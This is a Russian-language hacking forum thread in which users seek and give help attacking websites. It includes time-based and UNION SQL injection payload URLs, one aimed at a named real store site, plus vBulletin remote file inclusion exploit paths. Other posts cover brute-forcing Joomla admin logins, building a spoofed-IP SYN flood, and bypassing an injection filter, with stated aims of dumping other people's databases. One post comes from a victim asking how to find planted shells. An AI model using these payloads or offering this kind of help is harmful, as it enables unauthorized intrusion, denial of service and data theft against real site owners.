[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    ну добавлю и admin и администратор)
    т.е можно начинать со всех 1-2-3 символьных паролей брут?
     
  2. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    на джумле везде токены есть?
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    неправда. У id =62 логин admin, логина administrator по умолчанию в Joomla нету.

    Начиная с версии 1.5
     
    _________________________
  4. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    а у токенов всегда одинаковый формат?
    <input type="hidden" name="md5" value="1" />
    или где-то будет по другому?
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    одинаковый. Вида мд5, 32 символа.
     
    _________________________
  6. Pinkie

    Pinkie New Member

    Joined:
    1 Sep 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    чем отправлять post запрос на сайт чужой?
     
  7. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
    Плагин на exploit-db
    Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

    Я запрашиваю:
    1)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(blesse()))),0)--%20

    2)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20

    Какой либо задержки в обоих случаях не последовало.
    Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
     
  8. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Burp Suite, HTTP Analyze -> build request
     
    _________________________
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    сайт в пм вышли, я тут синтаксис напишу нужный
     
    _________________________
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Вывод можно добиться вот так

    _ttp://store.vampirefreaks.com/?cat_id=-11'+union+select+1,2,@@version,4,5+and+1='2

    Забудь про havij - он не более чем дампер. Выведешь руками - потом сдампишь.

    А вообще тема для подобных вопросов тут
     
    _________________________
    2 people like this.
  11. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Ну что не осилил?
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Продублируй в ПМ. Походу удалил случайно пока почту чистил.
     
    _________________________
  13. -WarMan-

    -WarMan- New Member

    Joined:
    8 Apr 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Мужики, кто знаком с Textpattern 4.0.5, подскажите в каком файле лежит шаблон. Доступа в админку нет, а через шелл не удается найти шаблон, уже все перерыл.
     
  14. dima.lysyj

    dima.lysyj New Member

    Joined:
    9 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Syn flood

    Подскажите пожалуйста с таким вопросом: Syn flood, собираю пакет с случайным ip, если отправляю пакет с той же подсети что и сервер, тогда на сервере создается очередь полуоткрытых соединений, если же подсеть другая (внешний канал) тогда пакеты не доставляются. Чексумма правильная. Совсем не знаю в чем ошибка.
     
  15. abako

    abako New Member

    Joined:
    3 Aug 2011
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Угнали ФТП,- нужно проверить на шеллы

    Здравствуйте форумчане, такая ситуация:
    вирус поймал, угнал мои фтп пароли, повшивали редиректов и .htaccess и ифреймов в шаблоны.
    Я все сделал - обезопасил доступ, но нужна помощь в проверке на шелы итд. - хостинг ukraine ком юа.
    буду рад любой информации или предложениям!
     
    1 person likes this.
  16. rk3v

    rk3v New Member

    Joined:
    31 Jan 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Какой алгоритм генерации хэшей паролей использует ebiz cms?
     
  17. warhamer2012

    warhamer2012 New Member

    Joined:
    2 Oct 2012
    Messages:
    36
    Likes Received:
    0
    Reputations:
    0
    Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion
    Кто-то пробовал? Все облазил-нашел только следующее
    # Exploit :
    #
    # http://www.site.com/path/includes/class_block.php?classfile=[shell code]
    #
    # http://www.site.com/path/vb/vb.php?filename=[shell code]
    #
    # http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]

    Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???

    Если не сюда пишу-посоветуйте раздел, где спросить можно.
     
  18. st0rk

    st0rk Banned

    Joined:
    15 Jan 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Есть frog cms, версию незнаю, не удалена папка install, есть рабочие способы получить админа - прочитть config.php , или хотя бы что-нибудь? с ресурса нужно слить все - и базу и шаблон.
     
  19. 3y6aH

    3y6aH New Member

    Joined:
    7 Feb 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    В общем хочу слить бд с сайта и есть sql иньекция но там есть фильтр/ы, пробывал с '
    но пишет "Hacking attempt!"
    Вот подскажите какие есть обойти фильтр
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Как мы должны попытаться тебе помочь не видя инъекции ?

    Шанс что мы попадём пальцев в небо - очень не велик.
     
    _________________________